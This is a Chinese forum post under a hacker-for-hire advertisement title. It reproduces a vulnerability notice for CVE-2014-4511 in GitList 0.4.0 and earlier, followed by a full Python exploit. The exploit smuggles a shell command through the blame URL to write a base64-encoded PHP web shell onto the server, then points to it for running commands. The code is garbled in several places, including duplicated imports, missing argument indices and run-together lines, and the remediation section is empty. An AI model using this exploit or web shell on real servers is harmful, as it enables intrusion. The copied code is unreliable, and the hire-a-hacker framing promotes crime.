rand_user 发表于 2020-10-28 00:00:00

先办事黑客在线接单 黑客愿意先做事再付钱

BUGTRAQID: 68253
CVE(CAN) ID: CVE-2014-4511

GitList是用PHP编写的开源软件,是git库浏览器。

GitList 0.4.0之前版本在实现上存在远程代码执行漏洞,远程攻击者可利用此漏洞执行任意代码。

<*来源:drone
*>
测试方法: --------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


复制代码代码如下:

from commands import getoutput

import urllib

import sys

from commands import getoutput

import urllib

import sys

“““

Exploit Title: Gitlist <= 0.4.0 anonymous RCE

Date: 06/20/2014

Author: drone (@dronesec)

Vendor Homepage: http://gitlist.org/

Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz

Version:<= 0.4.0

Fixed in: 0.5.0

Tested on: Debian 7

More information: http://hatriot.github.io/blog/2014/06/29/gitlist-rce/

cve: CVE-2014-4511

“““

if len(sys.argv) <= 1:

print \“%s: {cache path}\“ % sys.argv

print \“ Example: python %s http://localhost/gitlist/my_repo.git\“ % sys.argv

print \“ Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache\“ % sys.argv

sys.exit(1)

url = sys.argv url = url if url[-1] != \“/\“ else url[:-1]

path = “/var/www/gitlist/cache“

if len(sys.argv) >2:

path = sys.argv

print \“[!] Using cache location %s\“ % path

# payload payload = “PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=“

# sploit; python requests does not like this URL, hence wget is used

mpath = \“/blame/master/““`echo {0}|base64 -d > {1}/x.php`\“.format(payload, path)

mpath = url+ urllib.quote(mpath)

out = getoutput(“wget %s“ % mpath)

if \“500\“ in out:

print \“[!] Shell dropped; go hit %s/cache/x.php?cmd=ls\“ % url.rsplit(\“/\“, 1)

else:

print \“[-] Failed to drop\“

print out






建议:
--------------------------------------------------------------------------------
厂商补丁:




(责任编辑:网络)
页: [1]
查看完整版本: 先办事黑客在线接单 黑客愿意先做事再付钱